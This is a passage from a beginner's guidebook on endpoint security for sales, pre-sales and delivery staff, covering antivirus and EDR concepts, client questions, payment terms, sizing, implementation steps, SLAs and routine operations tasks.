What Is Endpoint Security

Endpoint Security
For
Sales, Pre-sales, & Delivery
BEGINNERS
Sudhansu M Nayak & OpenAI

Table of Contents
PREFACE .......................................................................................................................................................... 4
1. ANTI-VIRUS, ENDPOINT DETECTION AND RESPONSE- SIMPLE INTRODUCTIONS ...................................... 5
2. SIGNATURE-BASED VS SIGNATURE-LESS AV AND EDR: ............................................................................ 6
3. ENDPOINT SECURITY- ANTIVIRUS (AV) + ENDPOINT DETECTION & RESPONSE (EDR) ............................... 8
3.1 WHAT IS AN ANTI-VIRUS SOLUTION? ................................................................................................................ 8
3.1.1 What are viruses, trojans, worms, spyware? .................................................................................................. 8
3.1.2 What is a malware signature? ......................................................................................................................... 9
3.1.3 Anti-virus types ............................................................................................................................................... 9
3.1.4 Components of an EDR solution ................................................................................................................... 10
3.2 SALES CUE- QUESTIONS TO ASK AND ANSWERS TO GIVE ...................................................................................... 11
3.2.1 Questions to ask prospective client .............................................................................................................. 11
3.2.2 Questions prospective clients will ask of sales ............................................................................................ 12
3.2.3 Payment terms to agree with the clients...................................................................................................... 13
3.3 PRE-SALES CUE: SOLUTION BUILDING COMPLEXITIES .......................................................................................... 14
3.3.1 Sizing the anti-virus solution ........................................................................................................................ 14
3.3.2 To what will Antivirus solution connect to? .................................................................................................. 14
3.3.3 Implementation steps of Anti-virus solution................................................................................................ 15
3.3.4 What can go wrong in antivirus solution ....................................................................................................... 17
3.3.5 What Service Levels can be committed/ expected? ..................................................................................... 18
3.3.6 Why can't any vendor commit resolution time/ SLA accurately? ................................................................. 18
3.4 DELIVERY CUE- ANTI-VIRUS AND EDR OPERATIONS ........................................................................................... 19
3.4.1 Daily Anti-virus operations activities ............................................................................................................ 19
3.4.2 Weekly Anti-virus operations activities ........................................................................................................ 20
3.4.3 Monthly Anti-virus operations activities....................................................................................................... 20
3.4.4 What does an L1 Antivirus Engineer do? ....................................................................................................... 21
3.4.7 What does an EDR Service Engineer do ........................................................................................................ 24
3.4.8 What does an EDR Service Manager do ......................................................................................................... 28
3.4.9 Reports- Anti- Virus Operations.................................................................................................................... 32
3.4.10 Reports- EDR Operations .............................................................................................................................. 32
3.4.11 Governance of Antivirus solution .................................................................................................................. 33
3.4.12 Governance of EDR solution.......................................................................................................................... 34
4. ENDPOINT SECURITY- MOBILE SECURITY ............................................................................................... 37
4.1 WHAT IS A MOBILE THREAT DEFENCE SOLUTION? .............................................................................................. 37
4.1.1 EMM, MDM, MTD: What are these? ................................................................................................................ 37
4.1.2 EMM, MDM, MTD types .................................................................................................................................. 38
4.2 SALES CUE- QUESTIONS TO ASK AND ANSWERS TO GIVE ...................................................................................... 39
4.2.1 Questions to ask prospective client .............................................................................................................. 39
Page 2 of 52 Open to all

4.2.2 Questions prospective client will ask of sales .............................................................................................. 40
4.2.3 Payment terms to agree with the clients...................................................................................................... 40
4.3 PRE-SALES CUE: SOLUTION BUILDING COMPLEXITIES .......................................................................................... 41
4.3.1 Sizing the solution......................................................................................................................................... 41
4.3.2 To what will EMM, MDM, MTD solution connect to? ...................................................................................... 42
4.3.3 Implementation steps of EMM, MDM, MTD solution ..................................................................................... 42
4.3.4 What can go wrong in EMM, MDM, MTD solution .......................................................................................... 43
4.3.5 What Service Levels can be committed/ expected? ..................................................................................... 44
4.3.6 Why can't any vendor commit resolution time/ SLA accurately? ................................................................. 45
4.4 DELIVERY CUE- EMM MDM MTD OPERATIONS .............................................................................................. 45
4.4.1 Daily Activities ............................................................................................................................................... 45
4.4.2 Weekly Activities ........................................................................................................................................... 46
4.4.3 Monthly Activities.......................................................................................................................................... 46
4.4.4 What does an L1 EMM, MDM, or MTD Engineer do? ...................................................................................... 47
4.4.7 Reports .......................................................................................................................................................... 49
4.4.8 Governance of EMM, MDM, or MTD solution ................................................................................................. 50
ABOUT THE AUTHORS.................................................................................................................................... 52

Preface
This book is intended to simplify cyber security as much as possible and help beginners, semi-technical,
and non-technical practitioners with leading questions to field. To explain certain concepts, ideas have
been stretched to normal real-life scenarios. Please do send in your thoughts and questions for us to
make this more engaging.
The attempt to flatten the learning curve and build consensus among buyers, technology owners, and
service providers guided us to structure the book into technology chapters. Each chapter has basics
explained, a la what is the technology and how it helps, sales cue, pre-sales cue, and delivery cue.
Sales cue deals with what questions sales leaders can ask prospective clients to develop needs and use
cases. Similarly, in this section, we have also dealt with what possible questions may a prospective
client ask of the sales leader while exploring the use cases. And between the sales leaders and the
prospective clients, what parameters can they agree on while finalising the terms and conditions of
the sales transaction.
Pre-sales cue deals with what could be possible sizing guidelines or benchmarks for the technology, to
which other systems can the solution connect with, steps of implementation of the solution, services
levels parameters they can agree to, and where things can go wrong.
Delivery cue deals with daily, weekly, monthly operations activities, which level of capability (L1, L2,
L3) can manage what activities, typical set of reports for the solution, and what factors can be looked
at for a holistic governance of the solution.
This compilation is by no means the most exhaustive, but it aims to build enough thrust for beginners-
to-cyber-security sales, pre-sales, and delivery personnel to move to the next level of expertise. With
your continued support, we can augment this book easier to comprehend, manage the simplicity, and
still address frequently asked questions in the market
OpenAI has been used to generate answers to frequently asked questions and where necessary,
answers have been augmented by practical suggestions. Since OpenAI has been used, we have decided
to make this book open and free to use.
While reading the book, if you see a text-portion in saffron italics (for example: malware signatures),
it means the term has been explained in the next sub-section. If there are terms you want more
explanation on, please do give us the feedback and we shall try and add them to the sections. Italic
also shows new terms and some sample programs.
Hope you enjoy reading or referring to it more than we enjoyed compiling it.

1. Anti-Virus, Endpoint Detection and Response- simple introductions
“What will happen when someone alters, breaks or takes away my toys?”
—You, all the time
Just like how you wash your hands to avoid getting sick, antivirus helps keep your computer
healthy by finding and removing the bad stuff that can make it sick, like germs for your
computer.
Anti- Virus (AV) software is like a digital shield for your computer. It's a program that scans
your computer for potentially harmful files, just like how your body's immune system checks
for viruses. When you download or open files, the antivirus looks at them closely to see if they
match any known patterns of harmful software. If it finds something suspicious, it can
quarantine or remove it to protect your computer from getting sick.
Endpoint Detection and Response, called EDR for short, is like a digital detective for your
computer. While antivirus focuses on known threats, EDR goes a step further. Imagine if your
toys started moving on their own when you weren't looking – EDR would notice and tell you
something weird is happening on your computer. It helps keep your computer safe by
watching out for any sneaky things that shouldn't be there.
It constantly watches everything happening on your computer and checks for unusual or
suspicious activities. It's like having a security camera in your house that records everything
and alerts you if it sees anything strange. EDR helps detect new and previously unknown
threats by analyzing patterns and behavior, not just relying on known signatures.
Antivirus software and Endpoint Detection and Response want to catch bad guys. They look
at their faces, pictures, their special fingerprints, which are unique to each bad guy. These
fingerprints help the computer recognize if a file or program is a bad guy or not. So, a
'malicious software signature' is like a list of these special fingerprints that the computer uses
to catch and stop bad programs from doing harm. It's like having a secret code to identify the
bad guys and keep your computer safe.

2. Signature-based Vs Signature-less AV and EDR:
Signature-based EDR is like a computer detective who knows what different criminals look
like because they have pictures of their faces, their special fingerprints, which are unique to
each bad guy. These pictures are called "signatures." So, if a criminal matches one of these
pictures, the detective can say, "Hey, I know you're a bad guy!" It's like having a book of known
bad guys' photos, and if a new bad guy looks exactly like one in the book, we catch them.
Signatureless EDR is like a super-smart detective who doesn't need pictures and can spot
troublemakers even if they've never seen them before. Instead, this detective watches how
people act and figures out if they're doing something suspicious. Imagine if you're playing a
game, and you notice someone cheating even if you've never seen them before. They can tell
when someone is acting strange or doing something sneaky, even if it's a brand-new bad guy
nobody has seen before. This detective relies on patterns and behavior, not just pictures, to
catch the bad guys.
Signature-based EDR relies on pictures/ fingerprints or "signatures" to catch bad guys, while
Signatureless EDR relies on their wits and instincts to catch them.

This brilliant creation is from Adam Martinakis. https://www.martinakis.com/

3. Endpoint Security- Antivirus (AV) + Endpoint Detection & Response (EDR)
Endpoint security is a branch of cybersecurity that focuses on protecting individual devices
that connect to a network, such as
- computers,
- smartphones,
- tablets, and
- internet of things (IoT) devices.
The endpoint is the last line of defense against cyber threats, and the goal of endpoint security
is to prevent these devices from becoming compromised and used to access sensitive
information or launch attacks on the network.
Endpoint security typically involves a combination of hardware and software solutions,
including antivirus software, firewalls, and encryption technologies. The objective of endpoint
security is to protect the network by securing each endpoint and preventing the spread of
malware and other cyber threats.
3.1 What is an Anti-virus solution?
An anti-virus (AV) solution is a type of software that is designed to prevent, detect, and
remove malicious software, also known as malware, from a computer or network. Malware
can include viruses, trojans, worms, spyware, and other types of malicious software that can
cause harm to a computer or steal sensitive information.
An anti-virus solution typically works by continuously scanning a computer's files and
incoming emails and network traffic for known malware signatures.
If malware is detected, the anti-virus software will either remove it or quarantine it to prevent
it from spreading to other parts of the computer or network. Some anti-virus solutions also
include additional security features, such as firewalls, intrusion detection and prevention
systems, and real-time threat intelligence updates.
In short, an anti-virus solution is an essential tool in maintaining the security of a computer or
network and protecting against the spread of malware.
3.1.1 What are viruses, trojans, worms, spyware?
A virus is a type of malware that infects a computer by attaching itself to other legitimate
software. Once installed, a virus can spread to other parts of the computer and cause damage,
such as corrupting files or slowing down the system.
A trojan is a type of malware that disguises itself as legitimate software and is used to gain
unauthorized access to a computer. Trojans are often used by hackers to steal sensitive
information, such as passwords and credit card numbers.
A worm is a type of malware that is designed to spread itself from one computer to another,
often over a network. Unlike a virus, a worm does not need to attach itself to other software
and can spread on its own.

Spyware is a type of malware that is used to collect information about a computer and its
user, without their knowledge. Spyware can be used to track a user's internet activity, steal
passwords, and gather other sensitive information.
3.1.2 What is a malware signature?
Malware signatures are a set of unique patterns or characteristics that are used to identify a
specific type of malware. These signatures can include file names, code patterns, or other
unique identifiers that are unique to each type of malware.
Anti-virus (AV) software uses malware signatures to detect and remove malware from a
computer or network. When an AV software scans a computer or network, it compares the
files and incoming data to its database of known malware signatures. If a match is found, the
AV software can identify the type of malware and take the appropriate action, such as
removing the malware or quarantining it.
Malware signatures are constantly updated by anti-virus vendors to keep up with new and
evolving malware threats. This allows anti-virus software to stay current and effectively
protect against the latest cyber threats.
In short, malware signatures are a key component of anti-virus software, allowing it to
accurately identify and remove malware from a computer or network.
3.1.3 Anti-virus types
There are several types of anti-virus (AV) solutions, including:

1. Traditional Anti-Virus: This is the most basic type of anti-virus software and uses a
database of malware signatures to detect and remove malware from a computer or
network.
2. Real-Time Anti-Virus: This type of anti-virus software provides continuous protection
by scanning incoming data and files in real-time, as well as regularly scanning the
computer or network.
3. Behaviour-Based Anti-Virus: This type of anti-virus software looks for unusual
behaviour on a computer or network, such as a file executing itself without the user's
knowledge, to detect and remove malware.
4. Cloud-Based Anti-Virus: This type of anti-virus software uses the cloud to detect and
remove malware, which allows for faster and more effective protection against cyber
threats.
5. Endpoint Anti-Virus: This type of anti-virus software is designed specifically to protect
individual devices that connect to a network, such as laptops, smartphones, and IoT
devices.
In short, there are several different types of anti-virus solutions available, each with its own
strengths and weaknesses. The type of anti-virus solution that is best for a particular
organization will depend on its specific needs and requirements.

3.1.4 Components of an EDR solution
An EDR (Endpoint Detection and Response) solution is a comprehensive cybersecurity tool designed
to protect and monitor endpoints (such as computers, servers, and mobile devices) within a network.
It typically consists of several components that work together to detect, respond to, and mitigate
security threats. Here are the key components of an EDR solution:
1. Agent Software: EDR solutions usually require the installation of agent software on
each endpoint you want to protect. This agent collects data, monitors activities, and
communicates with the central EDR server or cloud-based platform.
2. Central Management Console: The central management console is the user interface
that security administrators use to configure, monitor, and manage the EDR solution.
It provides a centralized view of endpoint security status, alerts, and actions.
3. Data Collection and Analysis Engine: EDR solutions collect a vast amount of endpoint
data, including logs, system events, network traffic, and more. A data collection and
analysis engine processes this data in real-time to identify security threats and
suspicious behaviour.
4. Threat Detection and Analysis: EDR solutions use various methods for threat
detection, such as signature-based detection (identifying known threats), behaviour-
based analysis (detecting unusual or malicious behaviour), and machine learning
algorithms (predicting and identifying emerging threats).
5. Alerting and Reporting: When a potential security threat is detected, the EDR solution
generates alerts and reports. These alerts are sent to security administrators or a
security operations centre (SOC) for further investigation and action.
6. Incident Response and Remediation: EDR solutions often include incident response
capabilities. They allow security teams to take immediate action to contain and
mitigate threats. Actions may include isolating compromised endpoints, blocking
malicious processes, or removing malicious files.
7. Forensic Analysis Tools: EDR solutions provide tools for forensic analysis, which helps
security professionals investigate security incidents, understand the scope of an
attack, and identify the root cause.
8. Integration with SIEM: EDR solutions can integrate with Security Information and
Event Management (SIEM) systems to provide a broader view of security events across
the organization. This integration enhances threat detection and response capabilities.
9. Machine Learning and AI: Many modern EDR solutions leverage machine learning and
artificial intelligence to continuously improve threat detection and reduce false
positives. These technologies can analyse vast amounts of data to identify complex
threats.
10. Cloud-Based or On-Premises: EDR solutions can be cloud-based, where data is sent to
and managed in the cloud, or on-premises, where data remains within an
organization's own network. Cloud-based solutions offer scalability and ease of
management, while on-premises solutions provide more control over data.

11. Compliance and Reporting: EDR solutions often include features to help organizations
meet regulatory compliance requirements. They can generate compliance reports and
assist in audit processes.
12. User and Entity Behaviour Analytics (UEBA): Some EDR solutions incorporate UEBA
capabilities, which analyse user and entity behaviour to detect insider threats or
compromised accounts based on deviations from normal behaviour patterns.
13. Customizable Policies: EDR solutions allow organizations to define security policies
and rules tailored to their specific needs. These policies determine how the solution
responds to security events.
14. Updates and Threat Intelligence: EDR solutions rely on up-to-date threat intelligence
feeds and databases to identify known threats. Regular updates are essential to stay
current with emerging threats.
15. Integration with Other Security Tools: EDR solutions can integrate with other security
tools, such as firewalls, antivirus software, and intrusion detection systems, to provide
a comprehensive security posture.
These components work together to provide a robust defence against a wide range of cybersecurity
threats and enable organizations to proactively detect, respond to, and mitigate security incidents on
their endpoints.
3.2 Sales cue- Questions to ask and answers to give
3.2.1 Questions to ask prospective client
To gain a better understanding of the prospective client's current security situation and
identify potential areas where an anti-virus solution could provide additional protection, ask
the following questions. These can help you determine if the prospective client has a genuine
need for an anti-virus solution and how your solution can meet their specific requirements.
1. What types of devices does your organization use, and how are they connected to the
internet and each other?
2. What operating systems and platforms are these endpoints running (e.g., Windows,
macOS, Linux)?
3. Are any endpoints remote or mobile?
4. What types of data and information does your organization handle, and how is it
stored and protected?
5. Are there specific industry regulations or compliance standards (e.g., Indian IT Act, The
Digital Personal Data Protection Act, Reserve Bank of India, Insurance Regulatory and
Development Authority of India, Securities and Exchange Board of India, National
Payments Corporation of India, CERT-In, CEA (Cyber Security in Power Sector), HIPAA,
GDPR, or any other domestic or international regulation, directions, guidelines) that
your organization must adhere to?
6. How does EDR fit into your compliance strategy?

7. How often do your employees access sensitive information or use the internet while
on the job?
8. What security measures are currently in place to protect against cyber threats, such
as malware and hacking?
9. Have you experienced any security breaches or incidents in the past, and how were
they handled?
10. Do you have a budget allocated for EDR implementation and ongoing maintenance?
11. Do you have an in-house IT or cybersecurity team, or will you need external support?
12. Are there existing security tools or solutions you want the EDR system to integrate
with?
13. What level of integration with other security tools or SIEM systems do you require?
14. What are your organization's regulations and compliance requirements regarding data
security? What are your data privacy requirements, and how will the EDR solution
handle sensitive data?
15. How long do you need to retain EDR data for compliance or investigative purposes?
3.2.2 Questions prospective clients will ask of sales
Clients looking for an anti-virus solution may ask a variety of questions to determine if a
particular solution will meet their needs. Some common questions include:
1. What types of threats does the solution protect against?
2. How does the solution detect and prevent malware?
3. Can you provide an overview of your EDR solution? What makes your EDR solution
unique or different from others on the market?
4. Do you offer both cloud-based and on-premises deployment options? What are the
advantages and disadvantages of each deployment option?
5. What is the false positive rate of the solution? How does your EDR solution detect
security threats on endpoints? What response capabilities does it offer in case of a
detected threat?
6. Which operating systems and devices does your EDR solution support? Is it compatible
with our organization's existing endpoints?
7. How often are the virus definitions updated? Does the solution have a proven track
record of protecting against the types of threats faced by the client's industry or
organization?
8. Does the solution integrate with other security technologies, such as firewalls or
intrusion detection systems? Can your EDR solution integrate with our existing security
tools or SIEM system? What is the process for setting up these integrations?
9. How does the solution handle outbreak and rapidly evolving threats? How does your
EDR solution stay updated with the latest threat intelligence? Can you describe your
approach to threat detection and threat hunting?

10. What kind of support and maintenance is included with the solution?
11. Does the solution require any special hardware or software to run?
12. How does the solution impact performance and system resources?
13. Do you provide training and onboarding for our IT and security teams? What resources
are available for users to learn how to use the EDR solution effectively? What level of
technical support and maintenance is included with your EDR solution? What is the
service-level agreement (SLAs) for support response times?
14. What types of reports and analytics does your EDR solution provide? Can these reports
be customized to our organization's specific needs?
15. What is the cost of the solution and what payment options are available? What is the
pricing structure for your EDR solution? Are there additional costs for features or
scalability?
These are just a few examples of the types of questions that clients may ask when evaluating
an anti-virus solution. The specific questions that are asked will depend on the client's needs,
concerns, and requirements.
3.2.3 Payment terms to agree with the clients
All antivirus technology owners ask for advance payments, almost always 100% in advance.
So, unless clients pay similarly, the service providers come under heavy cash-flow situations.
Therefore, agreeing on 100% advance payments or back-to-back (client pays services/ system
integrator and system integrator pays antivirus technology owners via distributors) payment
options with clients always keeps the cash-registers green and healthy.
For further reference, the payment terms for antivirus solutions can vary depending on the
specific solution being offered. Some common payment options include:
1. Subscription-based: Many antivirus solutions are offered on a subscription basis,
where clients pay a monthly or annual fee to access the solution and receive ongoing
updates and support.
2. Per-device: Some antivirus solutions charge clients based on the number of devices
that the solution is installed on. This can be a useful option for organizations that need
to protect a large number of devices.
3. Per-user: Some antivirus solutions charge clients based on the number of users that
the solution is protecting, rather than the number of devices.
4. One-time fee: Some antivirus solutions are sold as a one-time fee, with no ongoing
subscription or maintenance costs.
5. Volume pricing: Some antivirus vendors offer volume pricing for clients that purchase
large numbers of licenses, as an incentive to increase sales.
These are just a few examples of the types of payment options that are available for antivirus
solutions. The specific payment terms will depend on the solution being offered. It's always
recommended to carefully review the terms and conditions of an antivirus solution before
making a purchase.

3.3 Pre-sales cue: Solution building complexities
3.3.1 Sizing the anti-virus solution
Sizing for an anti-virus solution involves determining the necessary resources and capacities
required to effectively protect a computer or network from malware and other security
threats. To do this, you will need to consider the following factors:
1. Environment size: The size of the environment, including the number of endpoints
and servers, will impact the size and capacity requirements of the anti-virus solution.
2. Threat landscape: The threat landscape will impact the number of malware detections
and the frequency of malware updates required, which will impact the processing
power, storage, and network bandwidth required.
3. Performance requirements: The performance requirements of the environment,
including the response time and processing power required, will impact the size and
capacity of the anti-virus solution.
4. Resource constraints: The available resources, including processing power, storage,
and network bandwidth, will impact the size and capacity of the anti-virus solution.
5. Scalability: The scalability of the environment, including the ability to add or remove
endpoints or servers as needed, will impact the size and capacity of the anti-virus
solution.
6. Security requirements: The security requirements of the environment, including the
need for real-time threat protection, will impact the size and capacity of the anti-virus
solution.
7. Encryption: Check for existing encryption and whether encryption keys are available
with client or not.
8. Make in India Clauses: Check for Make in India clauses in the compliance. Sometime
data residency and sovereignty compliance guidelines may build complications.
Once you ascertain these, then choose the type of anti-virus solution and the work on the
sizing using the technology and practice teams. In general, it is important to ensure the
solution is appropriately sized for the specific environment and security requirements. This
can help to minimize the risk of performance issues and ensure that the solution is effective
in protecting against malware and other security threats.
3.3.2 To what will Antivirus solution connect to?
An antivirus solution can potentially connect to a variety of other organizational systems,

depending on the specific needs and requirements of the organization. Some common
systems that antivirus solutions can connect to include:
1. Endpoint devices: Antivirus solutions can be installed on individual endpoint devices,
such as laptops, desktop computers, and mobile devices, to protect against malware
and other threats on those devices.

2. Network infrastructure: Antivirus solutions can integrate with network infrastructure
components, such as routers, switches, and firewalls, to provide a comprehensive view
of network traffic and identify potential threats.
3. Servers: Antivirus solutions can be installed on servers, including file servers, web
servers, and database servers, to protect against malware and other threats that
target those systems.
4. Cloud systems: Antivirus solutions can be integrated with cloud systems, such as cloud
storage services, to protect against malware and other threats in the cloud
environment.
5. Management systems: Antivirus solutions can integrate with management systems,
such as security information and event management (SIEM) systems, to provide
centralized management and reporting of antivirus activity.
These are just a few examples of the types of systems that antivirus solutions can connect to.
The specific systems that an antivirus solution will connect to will depend on the needs and
requirements of the organization.
3.3.3 Implementation steps of Anti-virus solution
The implementation steps of an antivirus solution typically involve the following:

1. Assessment: Before implementing an antivirus solution, it's important to assess the
current security environment and identify the specific needs and requirements of the
organization. This step can involve a threat analysis, security gap assessment, and
review of current security infrastructure.
a. Some clients ask for installing desk-side licenses on mobiles devices and
tablets. Note that the iOS, MacOS, Android, Windows, Unix, Linux
environments react differently and may need different type of licenses.
b. Some systems may have old hardware, software, firmware and may not
support latest version or next 2-3 years of updates on the technology. Do a
detailed diligence of the existing end-of-life or approaching-end-of-life devices
and query on status of warranty and annual maintenance contracts on all
endpoints.
c. Some organisations will have field personnel with devices without internet
connectivity (due to physical or compliance requirements (air-gapped
systems)) and organisation information security management policy may
prohibit USB/ Bluetooth access. These are tricky scenarios. Cross-check with
clients on these aspects and agree on the workable solution.
2. Planning: Based on the results of the assessment, a plan for implementing the antivirus
solution should be developed. This may involve determining the scope of the project,
identifying the systems and devices that need protection, and determining the budget
and timeline for the project.
3. Selection: Based on the results of the assessment and planning steps, a specific
antivirus solution can be selected. This may involve evaluating different solutions,
requesting demos, and comparing the features and costs of each solution.

4. Installation: Once a solution has been selected, it can be installed on the systems and
devices that need protection. This may involve downloading software, configuring
settings, and integrating the solution with other security technologies. The installation
steps of an antivirus solution typically involve the following:
a. Prepare the environment: Before installing the antivirus solution, it's important
to prepare the environment by checking the system requirements, backing up
important data, and disabling any conflicting software or security technologies.
Check for encryption. You will need to decrypt systems to prevent conflicts.
During the data backup process, sometimes endpoint devices or storage
devices misbehave and may crash. Discuss in detail what could be the possible
data recovery options with these lapses and who will bear the cost of these
data recovery charges. Sometimes, external data recovery specialists may be
needed to recover data and it has potential to exceed project budget.
b. Download the software: The antivirus software can be downloaded from the
vendor's website or obtained through other means, such as a CD or USB drive.
Check whether organisation allows using CDs or USB drives or large online data
drives.
c. Install the software: The installation process will vary depending on the
solution being used, but typically involves following the instructions provided
by the vendor. This may involve accepting a license agreement, choosing an
installation location, and configuring basic settings.
d. Configure the software: After the software has been installed, it will need to
be configured to meet the specific needs and requirements of the organization.
This may involve setting policies, defining security settings, and configuring
alert and reporting settings.
e. Update virus definitions: The antivirus software will need to be updated with
the latest virus definitions to ensure that it can effectively protect against
known threats. This can typically be done automatically or manually through
the software's interface.
f. Scan the system: Once the antivirus software has been installed and
configured, it's important to run a scan of the system to ensure that there are
no existing threats. The scan can be performed using the software's default
settings or using custom settings if desired.
g. Verify the installation: After the scan has been completed, it's important to
verify that the antivirus software is working as expected. This may involve
checking the accuracy of alerts, reviewing logs and reports, and ensuring that
the software is running without any errors or issues.
h. These are the general steps involved in installing an antivirus solution. The
specific steps will depend on the solution being used and the environment in
which it is being installed. It's always recommended to follow the vendor's
instructions and best practices when installing an antivirus solution.
5. Configuration: After installation, the antivirus solution will need to be configured to
meet the specific needs and requirements of the organization. This may involve setting

policies, defining security settings, and configuring alert and reporting settings.
Sometimes, in complex environments, configuration, fine-tuning, and stabilisation
takes 6-9 months of regular trial and error. This has potential for cost over-runs. Agree
with client on what the expectations are and if over-runs take place, how will they be
handled.
6. Testing: Before going live with the antivirus solution, it's important to test the solution
to ensure that it is working as expected. This may involve running tests, verifying the
accuracy of alerts, and checking the effectiveness of the solution against known
threats. Test Environments normally need extra
a. sandboxes,
b. hardware or virtual machines
c. operating systems and licenses,
d. database systems and licenses, and sometimes,
e. client access licenses
Clients normally agree to provide these environments. If not, these need to be costed
in the solution and provided as price to clients.
7. Deployment: After the solution has been tested and validated, it can be deployed in
the production environment. This may involve installing the solution on all devices,
updating virus definitions, and ensuring that the solution is integrated with other
security technologies.
8. Maintenance: After the antivirus solution has been deployed, ongoing maintenance
will be required to ensure that the solution remains effective and up to date. This may
involve updating virus definitions, applying software patches, and monitoring the
solution for performance and security issues.
These are the general steps involved in implementing an antivirus solution. The specific steps
will depend on the needs and requirements of the organization, as well as the solution being
used.
3.3.4 What can go wrong in antivirus solution
There are several things that can go wrong when implementing an antivirus solution,
including:
1. Compatibility issues: The antivirus solution may not be compatible with the systems
and devices that it is intended to protect, leading to performance issues or even
system crashes.
2. Configuration errors: The antivirus solution may be configured incorrectly, leading to
false positives or false negatives, or causing the solution to miss threats.
3. Updates not installed: If antivirus definition updates are not installed regularly, the
solution may be unable to protect against new threats.
4. Human error: The antivirus solution can only be as effective as the people using it.
User error, such as clicking on malicious links or disabling the antivirus solution, can
expose the system to risk.

5. Lack of integration: If the antivirus solution is not integrated with other security
technologies, such as firewalls or intrusion detection systems, it may not provide
adequate protection.
6. Performance impact: The antivirus solution may have a significant impact on system
performance, especially on older systems or systems with limited resources.
7. False alarms: The antivirus solution may generate false alarms, leading to user
frustration and potentially wasting time and resources.
8. Vulnerability exploitation: In some cases, the antivirus solution itself may contain
vulnerabilities that can be exploited by attackers.
These are just some of the potential issues that can arise when implementing an antivirus
solution. It's important to carefully consider these risks and take steps to mitigate them, such
as properly configuring the solution, regularly updating virus definitions, and providing user
education and training.
3.3.5 What Service Levels can be committed/ expected?
Service Level Agreements (SLAs) in antivirus services can vary depending on the specific needs
of an organization and the level of service offered by the provider. However, some common
SLAs that can be committed in antivirus services include:
1. Availability: The percentage of time that antivirus software and related systems are
available and functioning as intended.
2. Response time: The amount of time it takes for the antivirus support team to respond
to and resolve a reported issue.
3. Update frequency: The frequency at which the antivirus software is updated to
protect against new threats.
4. Threat detection rate: The percentage of malware incidents detected by the antivirus
software.
5. False positive rate: The percentage of benign files that are incorrectly flagged as
malware by the antivirus software.
6. Incident resolution time: The amount of time it takes to resolve a malware incident,
from the time it is reported to the time it is fully resolved.
7. Data privacy: The measures taken by the antivirus service provider to protect sensitive
data, such as client information, during the course of providing antivirus services.
These are just a few examples of the types of SLAs that can be committed in antivirus services.
The specific SLAs that are included in a contract will depend on the needs and requirements
of the organization. But, please keep in mind, it is not always possible to accurately provide a
resolution time commitment and hence, take penalty conditions in contracts.
3.3.6 Why can't any vendor commit resolution time/ SLA accurately?
Accurately providing a resolution time commitment in cybersecurity is challenging for several

reasons:

1. Complexity of security incidents: Cybersecurity incidents can range from simple
malware infections to complex, multi-faceted attacks that are difficult to fully
understand and resolve. This makes it difficult to accurately predict the amount of
time it will take to resolve a given incident.
2. Evolving threats: The nature of cyber threats is constantly evolving, with new and more
sophisticated attacks appearing all the time. This means that even experienced
cybersecurity teams may encounter new and unexpected challenges when attempting
to resolve an incident, which can make it difficult to provide accurate resolution time
commitments.
3. Interdependencies: Many cybersecurity incidents involve multiple systems and
technologies and resolving one issue may require resolving multiple underlying issues.
This can make it difficult to accurately predict the amount of time it will take to fully
resolve an incident.
4. Limited information: In many cases, the information available about a cybersecurity
incident may be limited or incomplete, making it difficult to accurately assess the
scope of the issue and predict the amount of time it will take to resolve.
Given these challenges, it is not always possible to accurately provide a resolution time
commitment in cybersecurity. Instead, cybersecurity teams may aim to provide a range of
possible resolution times, or a commitment to resolve the incident as quickly as possible,
while ensuring that all necessary steps are taken to thoroughly resolve the issue and prevent
future incidents.
3.4 Delivery cue- Anti-virus and EDR operations
3.4.1 Daily Anti-virus operations activities
Daily anti-virus operation activities typically include the following tasks:

1. Running regular scans: Regularly scanning all devices, systems, and networks for
malware to detect and remove any potential threats.
2. Updating malware definitions: Keeping the anti-virus software up to date with the
latest malware definitions to ensure that it can detect and remove the latest threats.
3. Monitoring event logs: Reviewing event logs for any suspicious activity, such as
repeated failed login attempts, to detect and respond to potential threats.
4. Managing quarantined files: Regularly reviewing and managing quarantined files to
ensure that no legitimate files are mistakenly quarantined and to determine the
appropriate action for any malware detected.
5. Maintaining backups: Regularly backing up important data to ensure that it can be
restored in the event of a malware attack or other security breach.
6. Evaluating security reports: Reviewing security reports to identify any potential
security weaknesses or areas where the anti-virus solution can be improved.
7. Responding to incidents: Responding quickly to any security incidents, such as a
malware attack, to contain the damage and prevent further spread of the malware.

In short, daily anti-virus operation activities are essential to ensuring the effective protection
of a computer or network against malware and other cyber threats. By performing these tasks
regularly, organizations can keep their anti-virus software up-to-date and effectively respond
to any potential threats.
3.4.2 Weekly Anti-virus operations activities
Weekly anti-virus operation activities typically include the following tasks:

1. Updating anti-virus software: Regularly updating the anti-virus software to ensure that
it has the latest security patches and features.
2. Reviewing scan results: Reviewing the results of regular anti-virus scans to ensure that
all devices, systems, and networks are free from malware and other threats.
3. Performing vulnerability assessments: Conducting regular vulnerability assessments to
identify any potential security weaknesses in the system and to determine what steps
need to be taken to address them.
4. Conducting security audits: Conducting security audits to ensure that all devices and
systems are properly configured and that all security measures are in place and
working as intended.
5. Testing disaster recovery procedures: Regularly testing disaster recovery procedures
to ensure that they will work as intended in the event of a malware attack or other
security breach.
6. Training employees: Providing regular training to employees on how to identify and
respond to cyber threats, as well as best practices for security awareness and safe
computing.
7. Reviewing security policies: Reviewing and updating security policies as needed to
ensure that they are current and relevant to the organization's changing security
needs.
In short, weekly anti-virus operation activities are essential to ensuring the ongoing
effectiveness of a computer or network's anti-virus solution. By performing these tasks
regularly, organizations can identify potential security weaknesses and take the necessary
steps to address them, as well as keep their employees informed and trained on how to
respond to cyber threats.
3.4.3 Monthly Anti-virus operations activities
Monthly anti-virus operation activities typically include the following tasks:

1. Reviewing security incidents: Reviewing and analysing security incidents from the past
month to determine if any trends or patterns exist, and to identify areas for
improvement in the anti-virus solution.
2. Evaluating security software: Evaluating the performance of the anti-virus software
and determining if it needs to be updated or replaced with a more effective solution.
3. Updating security plans: Updating the organization's security plans and procedures as
needed, to ensure that they are current and relevant to the organization's changing
security needs.

4. Conducting risk assessments: Conducting regular risk assessments to identify any
potential security risks and to determine what steps need to be taken to mitigate
them.
5. Reviewing user access: Reviewing user access logs to ensure that users are only
accessing the systems and data that they need to do their job, and to identify any
potential security threats.
6. Managing software licenses: Reviewing and managing software licenses to ensure that
all software used by the organization is properly licensed and up to date.
7. Monitoring network activity: Monitoring network activity for any unusual activity or
potential security threats.
In short, monthly anti-virus operation activities are important for maintaining the overall
security of a computer or network. By performing these tasks regularly, organizations can
identify potential security risks and take the necessary steps to mitigate them, as well as keep
their anti-virus software and security plans up-to-date and effective.
